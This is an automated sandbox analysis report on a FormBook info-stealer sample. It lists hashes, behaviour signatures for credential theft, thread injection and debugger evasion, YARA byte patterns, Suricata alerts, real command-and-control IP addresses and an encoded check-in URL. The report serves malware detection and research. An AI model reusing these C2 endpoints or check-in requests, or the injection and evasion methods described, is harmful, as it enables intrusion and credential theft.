Windows Analysis Report
r6lOHDg9N9.exe

Overview

General Information

Sample name: r6lOHDg9N9.exe (renamed because original name is a hash value)
Original sample name: bd12b7917d9fcc7512fa18d3546d728ec21c418f48a64333ec824937bd5b76c1.exe
Analysis ID: 1549349
MD5: 9f65c6e2192cc6757c1e7be556a4bc9a
SHA1: c3f40bc0b721df2ac07997098ef6d9a8a8b4d290
SHA256: bd12b7917d9fcc7512fa18d3546d728ec21c418f48a64333ec824937bd5b76c1
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • r6lOHDg9N9.exe (PID: 7072 cmdline: "C:\Users\user\Desktop\r6lOHDg9N9.exe" MD5: 9F65C6E2192CC6757C1E7BE556A4BC9A)
    • svchost.exe (PID: 6236 cmdline: "C:\Users\user\Desktop\r6lOHDg9N9.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • fZXsbVktlmkz.exe (PID: 1228 cmdline: "C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 7152 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • fZXsbVktlmkz.exe (PID: 4324 cmdline: "C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5024 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
    • 0x2bed0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1406f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
    • 0x484b1:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x30650:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
    • 0x2e313:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
    • 0x2f113:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\r6lOHDg9N9.exe", CommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", ParentImage: C:\Users\user\Desktop\r6lOHDg9N9.exe, ParentProcessId: 7072, ParentProcessName: r6lOHDg9N9.exe, ProcessCommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", ProcessId: 6236, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\r6lOHDg9N9.exe", CommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", ParentImage: C:\Users\user\Desktop\r6lOHDg9N9.exe, ParentProcessId: 7072, ParentProcessName: r6lOHDg9N9.exe, ProcessCommandLine: "C:\Users\user\Desktop\r6lOHDg9N9.exe", ProcessId: 6236, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T15:22:20.383399+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-05T15:22:51.689391+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.4 | 55453 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T15:22:56.464517+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 55454 | 154.23.184.60 | 80 | TCP
2024-11-05T15:23:28.155331+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 55609 | 209.74.95.29 | 80 | TCP
2024-11-05T15:23:41.940689+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 55686 | 136.143.186.12 | 80 | TCP
2024-11-05T15:23:56.136508+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 55731 | 133.130.35.90 | 80 | TCP
2024-11-05T15:24:09.525201+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 55735 | 3.33.130.190 | 80 | TCP
2024-11-05T15:24:23.261899+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 55739 | 31.31.196.17 | 80 | TCP
2024-11-05T15:24:36.778518+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 55743 | 172.96.187.60 | 80 | TCP
2024-11-05T15:24:50.689017+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 55747 | 161.97.142.144 | 80 | TCP
2024-11-05T15:25:04.198110+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 55751 | 13.248.169.48 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T15:22:56.464517+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 55454 | 154.23.184.60 | 80 | TCP
2024-11-05T15:23:28.155331+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 55609 | 209.74.95.29 | 80 | TCP
2024-11-05T15:23:41.940689+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 55686 | 136.143.186.12 | 80 | TCP
2024-11-05T15:23:56.136508+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 55731 | 133.130.35.90 | 80 | TCP
2024-11-05T15:24:09.525201+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 55735 | 3.33.130.190 | 80 | TCP
2024-11-05T15:24:23.261899+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 55739 | 31.31.196.17 | 80 | TCP
2024-11-05T15:24:36.778518+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 55743 | 172.96.187.60 | 80 | TCP
2024-11-05T15:24:50.689017+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 55747 | 161.97.142.144 | 80 | TCP
2024-11-05T15:25:04.198110+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 55751 | 13.248.169.48 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T15:23:20.484708+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55564 | 209.74.95.29 | 80 | TCP
2024-11-05T15:23:23.026740+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55578 | 209.74.95.29 | 80 | TCP
2024-11-05T15:23:25.564381+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55594 | 209.74.95.29 | 80 | TCP
2024-11-05T15:23:34.284729+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55644 | 136.143.186.12 | 80 | TCP
2024-11-05T15:23:36.834522+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55659 | 136.143.186.12 | 80 | TCP
2024-11-05T15:23:39.407521+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55674 | 136.143.186.12 | 80 | TCP
2024-11-05T15:23:48.464607+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55722 | 133.130.35.90 | 80 | TCP
2024-11-05T15:23:51.027181+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55729 | 133.130.35.90 | 80 | TCP
2024-11-05T15:23:53.581375+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55730 | 133.130.35.90 | 80 | TCP
2024-11-05T15:24:01.885452+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55732 | 3.33.130.190 | 80 | TCP
2024-11-05T15:24:05.324202+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55733 | 3.33.130.190 | 80 | TCP
2024-11-05T15:24:07.009732+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55734 | 3.33.130.190 | 80 | TCP
2024-11-05T15:24:15.620966+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55736 | 31.31.196.17 | 80 | TCP
2024-11-05T15:24:18.167829+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55737 | 31.31.196.17 | 80 | TCP
2024-11-05T15:24:20.714806+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55738 | 31.31.196.17 | 80 | TCP
2024-11-05T15:24:29.154609+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55740 | 172.96.187.60 | 80 | TCP
2024-11-05T15:24:31.721130+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55741 | 172.96.187.60 | 80 | TCP
2024-11-05T15:24:34.222625+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55742 | 172.96.187.60 | 80 | TCP
2024-11-05T15:24:42.790343+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55744 | 161.97.142.144 | 80 | TCP
2024-11-05T15:24:45.557370+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55745 | 161.97.142.144 | 80 | TCP
2024-11-05T15:24:48.166703+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55746 | 161.97.142.144 | 80 | TCP
2024-11-05T15:24:56.545697+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55748 | 13.248.169.48 | 80 | TCP
2024-11-05T15:24:59.100062+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55749 | 13.248.169.48 | 80 | TCP
2024-11-05T15:25:01.620535+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55750 | 13.248.169.48 | 80 | TCP
2024-11-05T15:25:10.405488+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 55752 | 104.16.6.253 | 80 | TCP

            AV Detection

Source: r6lOHDg9N9.exe; Avira: detected
Source: http://www.030002304.xyz/jkxr/; Avira URL Cloud: Label: malware
Source: http://www.030002304.xyz/jkxr/?X8Rx1=znhhIbB8nN&zhl=nfZmoz3ZNLa38WJC9Znh/BTcpJZiT6WI1J67BrQcysz4VkbFIz1C0Mwuu1KgUH3yzYFpHG8bYhuiS80nX0UZ0iO0BQhIJ00ZnTsDdGtBOXLHdb2igebUo2U=; Avira URL Cloud: Label: malware
Source: r6lOHDg9N9.exe; ReversingLabs: Detection: 65%
Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: r6lOHDg9N9.exe; Joe Sandbox ML: detected
Source: r6lOHDg9N9.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000001.00000002.2093567999.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093545639.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551281257.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000001.00000002.2093567999.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093545639.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551281257.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fZXsbVktlmkz.exe, 00000005.00000002.3551483374.0000000000B1E000.00000002.00000001.01000000.00000005.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163431808.0000000000B1E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: r6lOHDg9N9.exe, 00000000.00000003.1712107540.0000000004730000.00000004.00001000.00020000.00000000.sdmp, r6lOHDg9N9.exe, 00000000.00000003.1713194191.0000000004590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1996951815.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1993960398.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.0000000003200000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.0000000004450000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2093550027.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2095629016.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r6lOHDg9N9.exe, 00000000.00000003.1712107540.0000000004730000.00000004.00001000.00020000.00000000.sdmp, r6lOHDg9N9.exe, 00000000.00000003.1713194191.0000000004590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1996951815.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1993960398.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.0000000003200000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.3553071659.0000000004450000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2093550027.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2095629016.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000006.00000002.3551184016.0000000002865000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553914086.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163720492.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2383157688.000000002979C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000006.00000002.3551184016.0000000002865000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553914086.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163720492.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2383157688.000000002979C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe; Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe; Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe; Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe; Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe; Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe; Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe; Code function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe; Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe; Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe; Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
Source: C:\Windows\SysWOW64\write.exe; Code function: 6_2_001EC450 FindFirstFileW,FindNextFileW,FindClose,6_2_001EC450
Source: C:\Windows\SysWOW64\write.exe; Code function: 4x nop then xor eax, eax 6_2_001D9BE0
Source: C:\Windows\SysWOW64\write.exe; Code function: 4x nop then mov ebx, 00000004h 6_2_041F04E8

            Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55454 -> 154.23.184.60:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55454 -> 154.23.184.60:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55609 -> 209.74.95.29:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55609 -> 209.74.95.29:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55578 -> 209.74.95.29:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55564 -> 209.74.95.29:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55594 -> 209.74.95.29:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55644 -> 136.143.186.12:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55674 -> 136.143.186.12:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55722 -> 133.130.35.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55733 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55735 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55735 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55739 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55739 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55747 -> 161.97.142.144:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55747 -> 161.97.142.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55729 -> 133.130.35.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55737 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55740 -> 172.96.187.60:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55736 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55731 -> 133.130.35.90:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55731 -> 133.130.35.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55738 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55744 -> 161.97.142.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55749 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55730 -> 133.130.35.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55741 -> 172.96.187.60:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55742 -> 172.96.187.60:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55746 -> 161.97.142.144:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55743 -> 172.96.187.60:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55743 -> 172.96.187.60:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55751 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55751 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55748 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55745 -> 161.97.142.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55659 -> 136.143.186.12:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55752 -> 104.16.6.253:80
